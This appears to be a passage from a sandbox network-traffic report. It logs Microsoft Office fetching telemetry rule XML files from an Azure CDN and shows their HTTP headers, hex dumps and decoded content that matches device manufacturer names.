                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185320Z-178bfbc474bbbqrhhC1NYCvw7400000007yg00000000na81
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    43192.168.2.44983213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:20 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:20 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:20 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 404
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                    x-ms-request-id: b12c7864-501e-007b-43bf-3e5ba2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185320Z-178bfbc474bpscmfhC1NYCfc2c00000006fg000000009841
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    44192.168.2.44983413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:20 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:21 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:20 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 428
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                    x-ms-request-id: ffa63380-201e-006e-3b6c-3dbbe3000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185320Z-15b8b599d885v8r9hC1TEB104g000000069g00000000qr21
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:21 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    45192.168.2.44983313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:20 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:21 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:21 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 468
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                    x-ms-request-id: 0e283765-001e-0049-6380-3d5bd5000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185321Z-15b8b599d882l6clhC1TEBxd5c000000066000000000fnf8
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:21 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    46192.168.2.44983513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:22 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:22 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 499
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                    x-ms-request-id: aaf2b452-f01e-0071-621c-3e431c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185322Z-178bfbc474bbbqrhhC1NYCvw74000000081g00000000a3mq
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:23 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    47192.168.2.44983613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:22 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:22 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                    x-ms-request-id: a839412a-a01e-0032-5a3c-3d1949000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185322Z-15b8b599d889fz52hC1TEB59as00000006c0000000005ndh
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    48192.168.2.44983713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:22 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 471
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                    x-ms-request-id: 29297304-901e-0083-6776-3bbb55000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185323Z-174c587ffdfcb7qhhC1TEB3x7000000006eg000000008df7
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:23 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    49192.168.2.44983813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:22 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                    x-ms-request-id: bd408748-301e-0052-28b9-3d65d6000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185323Z-15b8b599d889fz52hC1TEB59as000000069000000000esru
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    50192.168.2.44983913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:23 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 494
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                    x-ms-request-id: 81bf26fc-f01e-0099-6bb6-3e9171000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185323Z-178bfbc474bwh9gmhC1NYCy3rs00000007v000000000savf
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    51192.168.2.44984113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:24 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:25 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                    x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185325Z-15b8b599d885v8r9hC1TEB104g000000068g00000000s9t2
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    52192.168.2.44984013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:24 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:25 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 420
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                    x-ms-request-id: 2160d4c7-701e-0021-5913-3d3d45000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185325Z-178bfbc474bp8mkvhC1NYCzqnn00000007mg00000000qt21
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
